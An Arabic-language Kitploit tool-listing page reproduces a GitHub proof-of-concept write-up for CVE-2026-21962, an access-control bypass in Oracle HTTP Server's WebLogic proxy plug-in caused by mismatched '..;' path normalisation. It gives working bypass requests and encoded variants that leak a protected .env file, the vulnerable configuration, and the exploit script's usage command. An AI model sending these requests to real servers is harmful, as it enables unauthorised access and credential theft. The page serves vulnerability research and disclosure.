Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-21962 — # إثبات مفهوم (PoC) مُتحقق منه وتحليل لـ CVE-2026-21962، وهو تجاوز للتحكم في الوصول في Oracle HTTP Server/WebLogic Proxy Plug-in عبر عدم اتساق تطبيع URI، مع سكربت استغلال وأدلة. | Kitploit
أدوات/GitHubGitHub/zeetee1235/cve-2026-21962
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالفريق الأحمر
GitHubzeetee1235/cve-2026-21962

CVE-2026-21962

# إثبات مفهوم (PoC) مُتحقق منه وتحليل لـ CVE-2026-21962، وهو تجاوز للتحكم في الوصول في Oracle HTTP Server/WebLogic Proxy Plug-in عبر عدم اتساق تطبيع URI، مع سكربت استغلال وأدلة.

عرض المستودع
منذ 12س 23دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-21962 — Oracle HTTP Server / WebLogic Server Proxy Plug-in

تجاوز التحكم في الوصول عبر عدم اتساق تطبيع URI

استغلال وتحليل مُعاد إنتاجه بشكل مستقل لـ CVE-2026-21962 (التحكم غير السليم في الوصول، CVSS 10.0) في Oracle HTTP Server / المكوّن الإضافي لوكيل Oracle WebLogic Server لخادم Apache HTTP Server.

الحالة: تم التحقق مقابل OHS 12.2.1.4.0 و 14.1.2.0.0 المباشر أمام WebLogic Server 12.2.1.4.


1. TL;DR

الواجهة الأمامية (OHS + mod_wl_ohs) والواجهة الخلفية (WebLogic) تطبّعان ..; بشكل مختلف. طلب مثل:

root@kitploit:~
GET /foo/..;/internal-admin/cont/.env HTTP/1.1

يتجاوز قاعدة حماية <Location /internal-admin> في الواجهة الأمامية لأن OHS لا يدمج ..;، بينما WebLogic يفعل ( = معامل مسار servlet، = الأصل). ثم تخدم الواجهة الخلفية المسار المحمي. النتيجة: (CWE-284).

;
..
تجاوز التحكم في الوصول في الواجهة الأمامية

انظر analysis/root-cause.md.

2. النطاق — بالضبط ما تم التحقق منه

تم التحقق (إعادة الإنتاج)

  • OHS 12.2.1.4.0 + mod_wl_ohs (WLSPLUGINS_12.2.1.4.0_LINUX.X64_190912.1848) أمام WebLogic Server 12.2.1.4.
  • OHS 14.1.2.0.0 + mod_wl_ohs (WLSPLUGINS_14.1.2.0.0_LINUX.X64_250908.1137) أمام WebLogic Server 12.2.1.4.
  • متغيرات التجاوز (جميعها تسرّب ملف .env المحمي):
    • /foo/..;/internal-admin/cont/.env
    • /foo/..%3b/internal-admin/cont/.env
    • /foo/..;jsessionid=xxxx/internal-admin/cont/.env
    • /foo/%2e%2e;/internal-admin/cont/.env
  • المسار المباشر (القانوني) محظور (404)، مما يثبت التجاوز.
  • الاستجابة تحمل ترويسات X-ORACLE-DMS-*، مما يثبت أنها استجابة حقيقية من الواجهة الخلفية (WebLogic).
  • سجل الوصول للواجهة الخلفية يُظهر الطلب مُطبّعًا إلى /internal-admin/... (GET /foo/../internal-admin/... 200).
  • اختبار A/B مكافئ للتصحيح: مع إصلاح تطبيع الواجهة الأمامية، نفس الطلب محظور (انظر evidence/).
  • URIs عائلة Ashwesker "RCE" تُرجع 404 على نفس النشر الضعيف (انظر poc-factcheck.md).

لم يتم التحقق

  • المكوّن الإضافي لوكيل WebLogic Server لـ IIS (isapi_wl، متأثر في 12.2.1.4.0). من المتوقع نفس الآلية (حل مسار servlet على الواجهة الخلفية)، لكن لم يتم إعادة إنتاجه على Windows.
  • الملفات الثنائية الرسمية المُصححة (مقيدة بـ Oracle SSO). تحليل التصحيح هو مقارنة ثنائية لنسختين ضعيفتين عامتين + عرض مكافئ للتصحيح (analysis/patch-analysis.md).
  • أي سلسلة RCE تتجاوز كشف البيانات / SSRF. يوضح هذا المشروع تجاوز تحكم في الوصول مع تسريب بيانات وسيناريو تمهيد SSRF؛ وهو لا يوضح تنفيذ أوامر نظام التشغيل، ولا يفعل ذلك أي PoC عام موثوق.

3. البيئة

الدورالمكوّنالإصدار
الواجهة الأماميةOracle HTTP Server12.2.1.4.0 / 14.1.2.0.0
المكوّن الإضافيmod_wl_ohs12.2.1.4 (190912) / 14.1.2 (250908)
الواجهة الخلفيةOracle WebLogic Server12.2.1.4
التطبيق المحمي/internal-admin/cont/.env (بيانات اعتماد مُختلقة)—

إعداد الواجهة الأمامية المستخدم (مُحفّز أدنى):

root@kitploit:~
<Location /foo>
  WLSRequest ON
  WebLogicCluster <backend>:7101
</Location>

<Location /internal-admin>
  ErrorDocument 404 'OHS: Disallowed location'
  Redirect 404 /
</Location>

4. الضعيف مقابل المُصحح (A/B)

نفس الطلب، نفس الواجهة الأمامية، نفس الواجهة الخلفية — فقط معالجة الواجهة الأمامية لـ ..; هي التي تتغير.

root@kitploit:~
GET /foo/..;/internal-admin/cont/.env HTTP/1.1
النشرHTTPتسريبالوصول للواجهة الخلفية
ضعيف200نعم (بيانات اعتماد .env)نعم (X-ORACLE-DMS-*)
مُصحح (تطبيع مُصلح)404لالا

الأدلة الخام (طلب / استجابة / سجلات الخادم):

  • evidence/vulnerable/
  • evidence/patched/

5. الاستخدام

root@kitploit:~
python3 exploit/CVE-2026-21962.py -t http://TARGET:PORT --auto-proxy --check ALL
  • --auto-proxy : اكتشاف تلقائي لبادئة وكيل WLSRequest (مثل /foo).
  • -c : المسار المحمي على الواجهة الخلفية (الافتراضي internal-admin/cont/.env).
  • --check LEAK|SSRF|ALL.
  • التحقق من استجابة الواجهة الخلفية يستخدم ترويسات X-ORACLE-DMS-*؛ يجب حظر طلب التحكم (المباشر) حتى يكون الحكم إيجابيًا.

انظر exploit/README.md للتفاصيل. استخدم فقط ضد الأنظمة التي لديك تفويض لاختبارها.

6. الملفات

root@kitploit:~
.
├── README.md                     هذا الملف
├── exploit/
│   ├── CVE-2026-21962.py         PoC مُتحقق منه (فحص تسريب حتمي)
│   └── README.md
├── evidence/
│   ├── vulnerable/               request.txt, response.txt, server-log.txt
│   └── patched/                  request.txt, response.txt, server-log.txt
├── analysis/
│   ├── root-cause.md             تحليل عدم تطابق التطبيع
│   └── patch-analysis.md         مقارنة ثنائية + A/B مكافئ للتصحيح
└── poc-factcheck.md              جدول مصداقية PoC العام + تفاصيل لكل PoC

أدوات الكشف / التخطيط النشطة (بصمة، فحص أعمى، خريطة تطبيع) التي تعمل دون معرفة مسار محمي محفوظة بشكل منفصل في ../../probe/.

السلامة

  • exploit/CVE-2026-21962.py SHA-256: 20f050abf2a8f0e5b644667c1f7f87bcd9b2448d03b8d5d89bd6ea71b6b4f75a

7. المراجع

  • Oracle CPU (يناير 2026): https://www.oracle.com/security-alerts/cpujan2026.html
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-21962
  • CISA KEV: https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21962
  • الباحث الأصلي: https://github.com/gregk4sec/cve-2026-21962

8. الاستخدام المسؤول

هذه المادة مقدمة لأغراض البحث في الثغرات والتحقق الدفاعي. لا تستخدمها ضد أنظمة دون تفويض. محتوى .env في الأدلة مُختلق؛ لا توجد بيانات اعتماد حقيقية مضمّنة.

تنزيل الأداة